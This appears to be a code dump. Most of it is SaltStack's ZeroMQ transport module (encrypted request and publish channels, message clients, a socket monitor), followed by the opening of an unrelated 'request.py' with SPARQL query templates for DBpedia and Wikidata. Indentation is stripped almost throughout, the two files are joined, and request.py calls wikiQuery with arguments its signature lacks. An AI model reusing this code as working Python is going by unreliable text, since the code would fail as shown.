aes = key.private_decrypt(ret['key'],
RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60, raw=False):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
        :param int tries: The number of attempts to make before giving up
        :param int timeout: The number of seconds to wait for a response before failing
'''
@tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
            # we may not always get data back; for example a salt-call ret
            # submission is a blind communication: we do not subscribe to
            # return events, we just upload the results to the master
if data:
data = self.auth.crypticle.loads(data, raw)
if six.PY3 and not raw:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
            # First attempt; if authentication fails we re-authenticate and retry below
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
        :param int tries: The number of attempts to make before giving up
        :param int timeout: The number of seconds to wait for a response before failing
'''
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout, raw=raw)
raise tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
self.io_loop = kwargs.get('io_loop')
if self.io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.hexid = hashlib.sha1(salt.utils.stringutils.to_bytes(self.opts['id'])).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, b'broadcast')
if self.opts.get('__role') == 'syndic':
self._socket.setsockopt(zmq.SUBSCRIBE, b'syndic')
else:
self._socket.setsockopt(
zmq.SUBSCRIBE,
salt.utils.stringutils.to_bytes(self.hexid)
)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, b'')
self._socket.setsockopt(zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts['id']))
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'])
log.debug(
"Generated random reconnect delay between '%sms' and '%sms' (%s)",
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay
)
log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay)
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug(
"Setting zmq_reconnect_ivl_max to '%sms'",
self.opts['recon_default'] + self.opts['recon_max']
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if (self.opts['ipv6'] is True or ':' in self.opts['master_ip']) and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def destroy(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
else:
self._stream.close(0)
elif hasattr(self, '_socket'):
self._socket.close(0)
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
self.publish_port = self.auth.creds['publish_port']
log.debug('Connecting the Minion to the Master publish port, using the URI: %s', self.master_pub)
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return _get_master_uri(self.opts['master_ip'],
self.publish_port,
source_ip=self.opts.get('source_ip'),
source_port=self.opts.get('source_publish_port'))
@tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
        # if it is only one message, then it's the old (unfiltered) style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
if (self.opts.get('__role') != 'syndic' and messages[0] not in ('broadcast', self.hexid)) or \
(self.opts.get('__role') == 'syndic' and messages[0] not in ('broadcast', 'syndic')):
log.debug('Publish received for not this minion: %s', messages[0])
raise tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
            raise Exception(('Invalid number of messages ({0}) in zeromq pub '
                             'message from master').format(messages_len))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise tornado.gen.Return(ret)
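    # Wire-format sketch (illustrative values): with zmq_filtering enabled the
    # publisher sends two frames, e.g.
    #   [sha1(minion_id).hexdigest() as bytes, <serialized payload>]
    # or [b'broadcast', <serialized payload>], while the unfiltered path sends a
    # single frame containing only the serialized payload.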
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin,
salt.transport.server.ReqServerChannel):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
self.__setup_signals()
salt.utils.process.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.clients.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
self._start_zmq_monitor()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except (KeyboardInterrupt, SystemExit):
break
def close(self):
'''
Cleanly shutdown the router socket
'''
if self._closing:
return
log.info('MWorkerQueue under PID %s is closing', os.getpid())
self._closing = True
# pylint: disable=E0203
if getattr(self, '_monitor', None) is not None:
self._monitor.stop()
self._monitor = None
if getattr(self, '_w_monitor', None) is not None:
self._w_monitor.stop()
self._w_monitor = None
if hasattr(self, 'clients') and self.clients.closed is False:
self.clients.close()
if hasattr(self, 'workers') and self.workers.closed is False:
self.workers.close()
if hasattr(self, 'stream'):
self.stream.close()
if hasattr(self, '_socket') and self._socket.closed is False:
self._socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
# pylint: enable=E0203
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def _start_zmq_monitor(self):
'''
Starts ZMQ monitor for debugging purposes.
:return:
'''
        # The socket monitor is only for debugging purposes, so using
        # threading doesn't look too bad here
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
log.debug('Starting ZMQ monitor')
import threading
self._w_monitor = ZeroMQSocketMonitor(self._socket)
threading.Thread(target=self._w_monitor.start_poll).start()
            log.debug('ZMQ monitor has been started')
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
        :param func payload_handler: A function to be called to handle incoming
                                     payloads as they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
self._start_zmq_monitor()
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket %s', self.w_uri)
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
Handle incoming messages from underlying TCP streams
:stream ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc:
exc_type = type(exc).__name__
if exc_type == 'AuthenticationError':
log.debug(
'Minion failed to auth to master. Since the payload is '
'encrypted, it is not known which minion failed to '
'authenticate. It is likely that this is a transient '
'failure due to the master rotating its public key.'
)
else:
log.error('Bad load from minion: %s: %s', exc_type, exc)
stream.send(self.serial.dumps('bad load'))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: %s and load was %s', payload, payload.get('load'))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise tornado.gen.Return()
try:
id_ = payload['load'].get('id', '')
if str('\0') in id_:
log.error('Payload contains an id with a null byte: %s', payload)
stream.send(self.serial.dumps('bad load: id contains a null byte'))
raise tornado.gen.Return()
except TypeError:
log.error('Payload contains non-string id: %s', payload)
stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
            stream.send(self.serial.dumps('Some exception handling minion payload'))
log.error('Some exception handling a payload from minion', exc_info=True)
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun %s', req_fun)
# always attempt to return an error to the minion
            stream.send(self.serial.dumps('Server-side exception handling payload'))
raise tornado.gen.Return()
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
self.close()
sys.exit(salt.defaults.exitcodes.EX_OK)
def _set_tcp_keepalive(zmq_socket, opts):
'''
Ensure that TCP keepalives are set as specified in "opts".
Warning: Failure to set TCP keepalives on the salt-master can result in
not detecting the loss of a minion when the connection is lost or when
it's host has been terminated without first closing the socket.
Salt's Presence System depends on this connection status to know if a minion
is "present".
Warning: Failure to set TCP keepalives on minions can result in frequent or
unexpected disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and opts:
if 'tcp_keepalive' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE, opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, opts['tcp_keepalive_intvl']
)
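# Illustrative call (hypothetical opts values) showing how the helper above is
# used; each key that is present is applied via setsockopt on the given socket:
#
#   _set_tcp_keepalive(sock, {'tcp_keepalive': 1,
#                             'tcp_keepalive_idle': 300,
#                             'tcp_keepalive_cnt': -1,
#                             'tcp_keepalive_intvl': -1})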
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return tornado.gen.sleep(5)
def _publish_daemon(self):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
_set_tcp_keepalive(pub_sock, self.opts)
        # if 2.1 <= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_sock.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on %s', pub_uri)
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on %s', pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.bind(pull_uri)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
log.trace('Getting data from puller %s', pull_uri)
package = pull_sock.recv()
unpacked_package = salt.payload.unpackage(package)
if six.PY3:
unpacked_package = salt.transport.frame.decode_embedded_strs(unpacked_package)
payload = unpacked_package['payload']
log.trace('Accepted unpacked package from puller')
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
log.trace('Sending filtered data over publisher %s', pub_uri)
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = salt.utils.stringutils.to_bytes(hashlib.sha1(topic).hexdigest())
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Filtered data has been sent')
# Syndic broadcast
if self.opts.get('order_masters'):
log.trace('Sending filtered data to syndic')
pub_sock.send(b'syndic', flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Filtered data has been sent to syndic')
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
log.trace('Sending broadcasted data over publisher %s', pub_uri)
pub_sock.send(b'broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Broadcasted data has been sent')
else:
log.trace('Sending ZMQ-unfiltered data over publisher %s', pub_uri)
pub_sock.send(payload)
log.trace('Unfiltered data has been sent')
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon)
def publish(self, load):
'''
Publish "load" to minions
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets:
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: %s", match_ids)
            # Send the list of minions through so zmq can target them
int_payload['topic_lst'] = match_ids
pub_sock.send(self.serial.dumps(int_payload))
pub_sock.close()
context.term()
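    # Shape sketch (hypothetical values) of the internal payload pushed above to
    # the publish daemon's PULL socket:
    #   {'payload': <serialized {'enc': 'aes', 'load': ..., 'sig': ...}>,
    #    'topic_lst': ['minion1', 'minion2']}   # present only for list/matched targets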
class AsyncReqMessageClientPool(salt.transport.MessageClientPool):
'''
    Wrapper class around AsyncReqMessageClient to avoid blocking while waiting to write data to the socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(AsyncReqMessageClientPool, self).__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs)
def __del__(self):
self.destroy()
def destroy(self):
for message_client in self.message_clients:
message_client.destroy()
self.message_clients = []
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
This class wraps the underlying zeromq REQ socket and gives a future-based
    interface to sending and receiving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The interface IP address to bind to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
install_zmq()
            self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
# TODO: timeout all in-flight sessions, or error
def destroy(self):
if hasattr(self, 'stream') and self.stream is not None:
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
else:
self.stream.close()
self.socket = None
self.stream = None
if self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
_set_tcp_keepalive(self.socket, self.opts)
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
log.debug('Trying to connect to: %s', self.addr)
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
@tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
                # The message already timed out; drop it and move on
del self.send_queue[0]
continue
# send
def mark_future(msg):
if not future.done():
data = self.serial.loads(msg[0])
future.set_result(data)
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except Exception as err: # pylint: disable=W0702
log.debug('Re-init ZMQ socket: %s', err)
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
            # It has not already timed out; cancel the pending timeout callback
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
'''
future = self.send_future_map.pop(message, None)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug('SaltReqTimeoutError, retrying. (%s/%s)', future.attempts, future.tries)
self.send(
message,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, tries=3, future=None, callback=None, raw=False):
'''
Return a future which will be completed when the message has a response
'''
if future is None:
future = tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
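    # Minimal usage sketch (hypothetical opts/address) of the future-based
    # interface described in the class docstring:
    #
    #   client = AsyncReqMessageClient(opts, 'tcp://127.0.0.1:4506', io_loop=io_loop)
    #
    #   @tornado.gen.coroutine
    #   def ping():
    #       reply = yield client.send({'cmd': 'ping'}, timeout=5, tries=3)
    #       raise tornado.gen.Return(reply)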
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
try:
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
except (AttributeError, zmq.error.ContextTerminated):
# We cannot log here because we'll get an interrupted system call in trying
# to flush the logging buffer as we terminate
pass
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: %s", evt)
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
request.py
|
import json
import re
import urllib.error
import urllib.parse
import urllib.request
from queue import Queue
from threading import Thread
import numpy as np
import pandas as pd
ex_query = '''
select *{
STR_TO_SUB
}
'''
q_db_wd_sameAs = '''
select ?db_uri ?wd_uri
where{
values ?db_uri { <STR_TO_SUB> }
?db_uri owl:sameAs ?wd_uri.
filter(contains(str(?wd_uri), "http://www.wikidata.org"))
}
'''
q_wd_db_sameAs = '''
select ?db_uri ?wd_uri
where{
values ?wd_uri { <STR_TO_SUB> }
?db_uri owl:sameAs ?wd_uri.
}
'''
dbfr_db_sameAS = '''
select ?db_fr_uri ?db_en_uri
where{
values ?db_fr_uri { <STR_TO_SUB> }
?db_fr_uri owl:sameAs ?db_en_uri.
filter(contains(str(?db_en_uri), "http://dbpedia.org"))
}
'''
dbfr_wiki_isPrimaryTopic = '''
select ?db_fr_uri ?wiki_uri
where{
values ?db_fr_uri { <STR_TO_SUB> }
?db_fr_uri foaf:isPrimaryTopicOf ?wiki_uri.
}
'''
dbfr_wiki_isDisambiguation = '''
select ?db_fr_uri ?db_fr_uri_disambiguation
where{
values ?db_fr_uri { <STR_TO_SUB> }
?db_fr_uri dbpedia-owl:wikiPageRedirects ?db_fr_uri_disambiguation.
}
'''
dben_wiki_isDisambiguation = '''
select ?db_en_uri ?db_en_uri_disambiguation
where{
values ?db_en_uri { <STR_TO_SUB> }
?db_en_uri dbo:wikiPageRedirects ?db_en_uri_disambiguation.
}
'''
qd_query = '''
select distinct *
where{
values ?s { <STR_TO_SUB> }
?s ?p ?o
<FILTER>
}
'''
url_wikidpedia_to_wikidataid = "/w/api.php?action=query&prop=pageprops&format=json&titles=<TITLE>"
def wikiSearchProperty(p, limit=1000000, columns=["?s", "?o"]):
edgelist_pd = pd.DataFrame(data=[], columns=columns)
offset = -1
while True:
offset += limit
df = wikiQuery(p=p, LIMIT=limit, OFFSET=offset)
if len(df) > 0:
edgelist_pd = edgelist_pd.append(df, ignore_index=True)
else:
break
return edgelist_pd
def wikiQuery(s, p, filter_q='', q=qd_query):
if s[0] == 'Q':
s = 'http://www.wikidata.org/entity/' + s
